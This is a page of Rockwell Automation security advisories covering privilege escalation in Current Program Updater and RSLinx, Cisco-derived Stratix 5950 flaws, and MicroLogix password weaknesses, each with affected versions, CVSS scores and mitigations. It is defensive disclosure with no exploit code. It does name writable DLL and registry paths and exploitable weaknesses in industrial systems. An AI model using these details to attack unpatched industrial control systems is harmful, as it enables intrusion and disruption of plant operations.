Rockwell Automation received a vulnerability report from Reid Wightman, a researcher from Dragos, regarding a file permission vulnerability affecting several Dynamic Link Library (DLL) files added during installation of the Current Program Updater software. If successfully exploited, this vulnerability may allow a local attacker to escalate privileges on the targeted PC to gain system administrative control.

Current Program Updater is installed with the Product Selection Toolbox™ suite along with other toolkits. For a full list, please see the affected products below.

Affected Products

Current Program Updater v1.1.0.7 and earlier.

The following tools use the affected version of Current Program Updater:

  • Batch Accelerator Toolkit v1.0.0.0
  • CENTERLINE® 2500 Global Production v1.0.4.0 and earlier
  • CENTERLINE Builder v3.19.0829.02
  • Computer Numerical Control (CNC) Accelerator Toolkit v0.0.0.0
  • Connected Components Accelerator Tool Kit v1.1.0.0 to v3.4.0.0
  • Connected Components Workbench™ software (CCW) v11 and earlier
  • Drives & Motions Accelerator Toolkit v1.0.0.0
  • Energy Management Accelerator Toolkit v3.0.0.0 and earlier
  • PowerOne v1.51.55 and earlier
  • Product Selection Toolbox Suite:
    • CrossWorks™ v4.3.0.11 and earlier
    • Integrated Architecture® Builder v9.7.9.1 and earlier
    • MCSStar v5.1.0.7
    • ProposalWorks™ v10.0.7185.14602 and earlier
    • Product Selection Toolbox Installer v.18.09.x and earlier
    • Prosafe® Builder v1.1.0.0 and earlier
    • Safety Automation Builder® v3.1.0.2 and earlier
    • User-Defined Devices v1.6.0.12 and earlier
  • Safety Accelerator Toolkit v6.0.0.0 and earlier
  • Water Wastewater Accelerator Toolkit v3 and earlier

Vulnerability Details

CVE-2017-5176: File Permission Vulnerability Leading to Privilege Escalation
A local, authenticated attacker could write to several directories containing Dynamic Load Library (DLL) files that execute with system level privilege. These DLL files inherit the properties of these directories, meaning DLL files that run at the system level can be written to by a normal user and lead to an escalation of privileges. Certain registry keys were also found to be writeable to normal users.

A CVSS v3 base score of 7.0/High has been assigned; the CVSS v3 vector string is CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Customers currently using any of the affected tools are encouraged to take the following actions:

  1. Existing customers using affected versions of the tools should update to the newest version of the tools. Existing users can do this by running an update in Current Program Updater. New users can do this by accepting and running the Current Program Updater update offered immediately during installation. After the tool runs, it will apply the most recent version of Current Program Updater as well as the most recent version of the tools currently installed. Fixed versions of toolkits will no longer allow the toolkits to make changes to the access controls of files and registry keys.
  2. Work with your IT administrators to ensure that the following files and registry keys have the correct access control permissions. Ensure that the least-privilege user principle is followed, and user/service account access is only granted with a minimum number of rights as needed.
Toolkit Impacted Registry Keys or Files
All Tools C:WindowsSysWOW64raise.dll
C:WindowsSysWOW64SSPodt.exe
HKEY_CLASSES_ROOTRAISE
Batch Accelerator Toolkit HKEY_CLASSES_ROOTRAISEInstalled ComponentsBatch
CENTERLINE 2500 Global Product Configuration Builder HKEY_CLASSES_ROOTRAISEInstalled ComponentsInstalled ComponentsEST_Adv
CENTERLINE Builder HKEY_CLASSES_ROOTRAISEInstalled ComponentsCENTERLINEBuilder
CNC Accelerator Toolkit HKEY_CLASSES_ROOTRAISEInstalled ComponentsCMAT
Connected Components Accelerator Tool Kit HKEY_CLASSES_ROOTRAISEInstalled ComponentsCCAT
Current Program Updater HKEY_CLASSES_ROOTRAISEInstalled ComponentsShared
Drives and Motion Accelerator Toolkit HKEY_CLASSES_ROOTRAISEInstalled ComponentsSimp_DMAT
Energy Management Accelerator Toolkit HKEY_CLASSES_ROOTRAISEInstalled ComponentsSimp_EMAT
Product Selection Toolbox Suite HKEY_CLASSES_ROOTRAISEInstalled ComponentsShared
&Safety Accelerator Toolkit HKEY_CLASSES_ROOTRAISEInstalledComponentsSimp_SafetyGuardLogix
Water Wastewater Accelerator Toolkit HKEY_CLASSES_ROOTRAISEInstalled ComponentsSimp_WWWAT
  1. If a toolkit has been installed to a custom directory, customers are encouraged to identify what other directories may have had the access level privileges modified by the toolkits and work with their IT administrator to ensure the directories have the correct level of permissions. Ensure that the least-privilege user principle is followed, and user/service account access is only granted with a minimum number of rights as needed. To identify these directories, customers can review the list at the following registry key:

    HKEY_CLASSES_ROOTRAISEInstalled Components

The following toolkits are considered End of Life (EOL):

Product Family Suggested Actions
Connected Components Accelerator Tool Kit
Drives & Motions Accelerator
CNC Accelerator Toolkit
Safety Accelerator Toolkit
Energy Management Accelerator Toolkit
Water Wastewater Accelerator Toolkit		 Customers are encouraged to discontinue use of these toolkits and uninstall if possible and follow the remediation steps outlined above.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLockeror other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1499 | PN1499 | RSLinx Classic Privilege Escalation Vulnerability
Published Date:
April 09, 2020
Last Updated:
April 09, 2020
CVE IDs:
CVE-2020-10642
Products:
RSLinx Classic (Single Node
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - April 09, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from the researcher William Knowles at Applied Risk regarding a vulnerability in RSLinx® Classic software, which if successfully exploited, could allow an authenticated attacker to gain elevated or SYSTEM level privileges.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

RSLinx versions 4.11.00 and earlier.

Vulnerability Details

CVE-2020-10642: Privilege Escalation via Weak Registry Key Permissions
An authenticated, local attacker could modify the registry key, which could lead to the execution of malicious code when RSLinx Classic was opened. The code would run under the same system privileges as RSLinx and therefore, could be used for privilege escalation.

CVSS v3.0 Base Score: 8.8/HIGH
CVSS v3.0 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of RSLinx Classic are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Product Family Suggested Actions
RSLinx Classic Apply Patch 1091155 (Download). The patch can be applied to v3.60 to v4.11, but customers are encouraged to apply the most recent version of RSLinx Classic.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Ensure that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

ADDITIONAL LINKS

Critical
PN1027 | PN1027 | Stratix 5950 Contains Multiple Vulnerabilities
Published Date:
April 07, 2020
Last Updated:
April 07, 2020
CVE IDs:
CVE-2018-0228, CVE-2018-0296, CVE-2018-0227, CVE-2018-0231, CVE-2018-0240
Products:
Stratix 5950 Security Appliance
CVSS Scores:
7.5, 10.0, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 21, 2018.  Initial Release.
Revision History
Revision Number
1.1
Revision History
Version 1.1 - April 07, 2020.  Updates to mitigations and other languages.

Introduction

Stratix 5950 Client Certificate Bypass and Denial of Service Vulnerabilities

Description

Executive Summary

Cisco Systems, Inc. (“Cisco”) has released advisories detailing multiple vulnerabilities in Cisco Adaptive Security Appliance (“ASA”) Software that, if successfully exploited, could potentially allow a threat actor to bypass client certification to create connections to the affected device, cause an affected device to crash, or allow a threat actor to view potentially sensitive data on a device. The Allen-Bradley® Stratix® 5950 uses Cisco ASA software as its central operating system; this enables the security device to offer capabilities that include providing proactive threat defense for industrial control systems.

Customers using affected versions of this product are encouraged to evaluate the mitigations provided below, and apply any appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided below.

Affected Products

Allen-Bradley® Stratix® 5950 Security Appliance
(Cisco Adaptive Security Appliance v9.6.2 and earlier)

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9

Vulnerability Details

Vulnerability #1: Flow Creation Denial of Service Vulnerability
A vulnerability in the ingress flow creation functionality of Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause the CPU to increase upwards of 100 percent utilization, causing a denial of service (DoS) condition on an affected system.

The vulnerability is due to incorrect handling of an internal software lock that could prevent other system processes from getting CPU cycles, causing a high CPU condition. A threat actor could exploit this vulnerability by sending a steady stream of malicious IP packets that can cause connections to be created on the targeted device. A successful exploit could allow the threat actor to exhaust CPU resources, resulting in a DoS condition during which traffic through the device could be delayed. This vulnerability applies to either IPv4 or IPv6 ingress traffic either to or across an affected device.

CVE-2018-0228 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Vulnerability #2: Virtual Private Network SSL Client Certificate Bypass Vulnerability
A vulnerability in the Secure Sockets Layer (SSL) Virtual Private Network (VPN) Client Certificate Authentication feature for Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote threat actor to establish an SSL VPN connection and bypass certain SSL certificate verification steps.

The vulnerability is due to incorrect verification of the SSL Client Certificate. A threat actor could exploit this vulnerability by connecting to the ASA VPN without a proper private key and certificate pair. A successful exploit could allow the threat actor to establish an SSL VPN connection to the ASA when the connection should have been rejected.

CVE-2018-0227 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N.

Vulnerability #3: Transport Layer Security Denial of Service Vulnerability
A vulnerability in the Transport Layer Security (TLS) library of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote threat actor to trigger a reload of the affected device resulting in a denial of service (DoS) condition.

The vulnerability is due to insufficient validation of user-supplied input. A threat actor could exploit this vulnerability by sending a malicious TLS message to an interface enabled for Secure Layer Socket (SSL) services on an affected device. Messages using SSL Version 3 (SSLv3) or SSL Version 2 (SSLv2) cannot be be used to exploit this vulnerability. An exploit could allow the threat actor to cause a buffer underflow, triggering a crash on an affected device.

CVE-2018-0231 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Vulnerability #4 Application Layer Protocol Inspection Denial of Service Vulnerabilities
Multiple vulnerabilities in the Application Layer Protocol Inspection feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote threat actor to trigger a reload of an affected device, resulting in a denial of service (DoS) condition.

The vulnerabilities are due to logical errors during traffic inspection. A threat actor could exploit these vulnerabilities by sending a high volume of malicious traffic across an affected device. An exploit could allow the threat actor to cause a deadlock condition, resulting in a reload of an affected device.

CVE-2018-0240 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Vulnerability #5: Web Services Denial of Service or Potential Sensitive Information Disclosure
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote threat actor to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but a threat actor could view sensitive system information without authentication by using directory traversal techniques.

The vulnerability is due to lack of proper input validation of the HTTP URL. A threat actor could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the threat actor to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic.

CVE-2018-0296 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected devices are encouraged to update to an available firmware revision that addresses the associated risk and are encouraged when possible, to combine this guidance with the general security guidelines to employ multiple strategies simultaneously.

Update the Stratix 5950 per the table below:

Vulnerability Suggested Actions
#1: Flow Creation Denial of Service Vulnerability
#2: Virtual Private Network SSL Client Certificate Bypass Vulnerablity
#3: Transport Layer Security Denial of Service Vulnerability
#4: Application Layer Protocol Inspection Denial of Service Vulnerabilities
#5 Web Services Denial of Service or Potential Sensitive Information Disclosure		 Apply FRN v6.4.0 (Download)

Secondary Mitigations include the following:

  • #1: Flow Creation Denial of Service Vulnerability: The ASA and FTD configuration commands, set connection per-client-embryonic-max (TCP) and set connection per-client-max (TCP, UDP, and Stream Control Transmission Protocol {SCTP}), can be configured to limit the number of connection requests allowed. Using these configuration parameters can reduce the number of connections and greatly reduce the impact of the DoS attack.
  • #5 Web Services Denial of Service or Potential Sensitive Information Disclosure: Cisco has released Snort Rule 46897.

General Security Guidelines

  1. Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.
  2. Locate control system networks and devices behind firewalls and isolate them from the business network.
  3. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site (https://rok.auto/security)

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

ADDITIONAL LINKS

Attachments

High
PN1046 | PN1046 | Stratix 5950 Denial of Service Vulnerability
Published Date:
April 07, 2020
Last Updated:
April 07, 2020
CVE IDs:
CVE-2018-0472
Products:
Stratix 5950 Security Appliance
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - April 04, 2019.  Initial Release
Revision History
Revision Number
1.1
Revision History
Version 1.1 - April 7, 2020.  Updates to mitigations.

Introduction

Stratix 5950 Denial of Service Vulnerability

Description

Executive Summary

Cisco® released its semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which included seven security advisories that affect Allen-Bradley® products. One of these vulnerabilities affects the following Allen-Bradley Stratix® product:

  • Allen-Bradley Stratix 5950 Security Appliance

Affected Products

Allen-Bradley Stratix 5950 Security Appliance

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9

Vulnerability Details

Cisco Adaptive Security Appliance (ASA) IPsec Denial of Service

A vulnerability in the IPsec driver code of multiple Cisco IOS XE Software platforms and the Cisco ASA 5500-X Series Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause the device to reload.

The vulnerability is due to improper processing of malformed IPsec Authentication Header (AH) or Encapsulating Security Payload (ESP) packets. An attacker could exploit this vulnerability by sending malformed IPsec packets to be processed by an affected device. An exploit could allow the attacker to cause a reload of the affected device.

NOTE: IPsec is disabled by default in the Allen-Bradley Stratix 5950 devices.

The security disclosure from Cisco for their IOS XE and Cisco ASA 5500-x Series is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180926-ipsec.

CVE-2018-0472 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected devices are encouraged to update to an available firmware revision that addresses the associated risk and are encouraged when possible, to combine this guidance with the general security guidelines to employ multiple strategies simultaneously.

Update the affected products per the table below:

Product Suggested Actions

Stratix 5950 Security Appliance

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9
 Apply FRN v6.4.0 (Download)

General Security Guidelines

  1. Utilize proper network infrastructure controls, such as firewalls, to help ensure that requests from unauthorized sources are blocked and the controls are isolated from the business network.
  2. Consult the product documentation for specific features, such as access control lists and deep pack inspection, to which may be used to block unauthorized changes, etc.
  3. Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID 898270.
  4. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com). Please direct all media inquiries to Keith Lester (klester@ra.rockwell.com).

ADDITIONAL LINKS

Medium
PN1100 | PN1100 | Stratix 5950 Secure Boot Hardware Tampering Vulnerability
Published Date:
March 10, 2020
Last Updated:
March 10, 2020
CVE IDs:
CVE-2019-1649
Products:
__productNames
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
Revision 1.0
Revision History
March 10, 2020.  Initial Release.

Executive Summary

Cisco Systems, Inc. (Cisco) released an advisory regarding a vulnerability in the logic that handles access control to a hardware component in Cisco’s proprietary Secure Boot implementation. If successfully exploited, an attacker could write a modified firmware image to the component. The Allen-Bradley® Stratix® 5950 utilizes Cisco’s proprietary Secure Boot implementation.

Customers using affected versions of this product are encouraged to evaluate the mitigations provided below and apply any appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided below.

Affected Products

Allen-Bradley Stratix 5950 Security Appliance:

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9

Vulnerability Details

CVE-2019-1649: Cisco Secure Boot Hardware Tampering
A vulnerability in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write their own modified firmware image to the affected component.

The vulnerability is due to an improper check on the area of code that manages on-premise updates to a Field Programmable Gate Array (FPGA) part of the Secure Boot hardware implementation. An attacker with elevated privileges and access to the underlying operating system running on the affected device could utilize this vulnerability to write a modified firmware image to the FPGA. A successful exploit could cause the device to become unusable (and require a hardware replacement) or allow tampering with the Secure Boot verification process, which under some circumstances may allow the attacker to install and boot a malicious software image.

The security disclosure from Cisco regarding their Secure Boot implementation is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-secureboot.

CVSS v3.1 Base Score: 6.7/10[MEDIUM]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected devices are encouraged to update to an available firmware revision that addresses the associated risk and are encouraged when possible, to combine this guidance with the general security guidelines to employ multiple strategies simultaneously.

Update the affected products per the table below:

Vulnerability Product Suggested Actions
CVE-2019-1649 Stratix 5950 Security Appliance
  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9
 Apply FRN v6.4.0 (Download)

General Security Guidelines

  1. Utilize proper network infrastructure controls, such as firewalls, to help ensure that requests from unauthorized sources are blocked and the controls are isolated from the business network.
  2. Consult the product documentation for specific features, such as access control lists and deep pack inspection, to which may be used to block unauthorized changes, etc.
  3. Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID 898270.
  4. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

Critical
PN1411 | PN1411 | MicroLogix Controllers, RSLogix 500 Software Contains Multiple Vulnerabilities Affecting Confidentiality
Published Date:
March 05, 2020
Last Updated:
March 05, 2020
CVE IDs:
CVE-2020-6980, CVE-2020-6990, CVE-2020-6988, CVE-2020-6984
Products:
RSLogix 500
CVSS Scores:
4.0, 5.9, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
Version 1.0
Revision History
March 05, 2020 - Intitial release.

Executive Summary

A subset of MicroLogix™ controllers and RSLogix 500® software contain multiple vulnerabilities that could allow an attacker to gain access to sensitive project file information including passwords. Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies submitted reports to Rockwell Automation regarding several vulnerabilities found in the Allen-Bradley® MicroLogix controllers and RSLogix 500 software. A subset of these vulnerabilities was also independently co-discovered and reported by Rongkuan Ma, Xin Che, and Peng Cheng from 307 Lab.

Customers using affected versions of these products are encouraged to evaluate their risk and apply the appropriate mitigations provided below to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1400 Controllers
Series B, v21.001 and earlier
Series A, all versions

MicroLogix 1100 Controllers
All versions

RSLogix 500® Software
V12.001 and earlier

Vulnerability Details

CVE-2020-6990: Use of Hard-Coded Cryptographic Key
The cryptographic key utilized to help protect the account password is hard-coded into the RSLogix 500 binary file. An attacker could identify cryptographic keys and use it for further cryptographic attacks that could ultimately lead to a remote attacker gaining unauthorized access to the controller.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS v3.1 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.

CVE-2020-6984: Use of a Broken or Risky Algorithm for Password Protection
The cryptographic function utilized to protect the password in MicroLogix is discoverable. This password protects access to the device. If successfully exploited a remote attacker could gain unauthorized access to the controller.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS v3.1 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-6988: Use of Client-Side Authentication
A remote, unauthenticated attacker can send a request from the RSLogix 500 software to the victim’s MicroLogix controller, and the controller will then respond to the client with used password values to authenticate the user on the client-side. This method of authentication may allow an attacker to bypass authentication altogether, disclose sensitive information, or leak credentials.

CVSS v3.1 Base Score: 5.9/MEDIUM
CVSS v3.1 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N.

CVE-2020-6980: Unsecured SMTP Data Storage
If Simple Mail Transfer Protocol (SMTP) account data is saved in RSLogix 500, a local attacker with access to a victim’s project file or the controller, may be able to gather SMTP server authentication data as it is written to the project file in cleartext.

CVSS v3.1 Base Score: 4.0/MEDIUM
CVSS v3.1 Vector String: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N.

Acknowledgements:

CVE# Discovery Attribution
CVE-2020-6990 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies.
CVE-2020-6984 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies.  Independently co-discovered by Rongkuan Ma, Xin Che, and Peng Cheng from 307 lab.
CVE-2020-6988 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies.  Independently co-discovered by Rongkuan Ma, Xin Che, and Peng Cheng from 307 lab.
CVE-2020-6980 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies.

Risk Mitigation & User Action

Customers are encouraged to assess their level of risk regarding their specific applications and update to the latest available firmware or software version that addresses the associated risk. Customers who are unable to update are directed to the risk mitigation strategies provided below and are encouraged, when possible, to combine these strategies with the general security guidelines to employ multiple strategies simultaneously.

Note: Customers using affected versions of MicroLogix 1400 or MicroLogix 1100 are urged to contact their local distributor or sales office to upgrade their devices to MicroLogix 1400 Series B or a newer product line.

Product Catalog Numbers Suggested actions for CVE-2020-6990, CVE-2020-6984, and CVE-2020-6988 Suggested actions for CVE-2020-6980
MicroLogix 1400 controllers, Series B 1766-L32AWA
1766-L32AWAA
1766-L32BWA
1766-L32BWAA
1766-L32BXB
1766-L32BXBA		 Apply FRN 21.002 or later for MicroLogix 1400 Series B devices (Download).  Use the Enhanced Password Security feature. Apply FRN 21.002 or later for MicroLogix 1400 Series B devices (Download).  Use the Enhanced Password Security feature.
MicroLogix 1400 controllers, Series A 1766-L32AWA
1766-L32AWAA
1766-L32BWA
1766-L32BWAA
1766-L32BXB
1766-L32BXBA		 No direct mitigation. No direct mitigagion.
MicroLogix 1100 controllers. 1763-L16BWA
1763-L16AWA
1763-L16BBB
1763-L16DWD		 No direct mitigation. No direct mitigation.
RSLogix 500® software R324-RL0x Apply version V11 or later (Download), used in conjunction with applied FRN 21.002 or later for MicroLogix 1400 Series B devices.  Use the Enhanced Password Security feature.

Other configurations, no direct mitigation.		 No direct mitigation.

General Security Guidelines

  1. Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted websites and attachments.
  2. Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet.
  3. Locate control system networks and devices behind firewalls and isolate them from the business network.
  4. When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  7. Use of the Microsoft® AppLocker application or another similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  8. Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

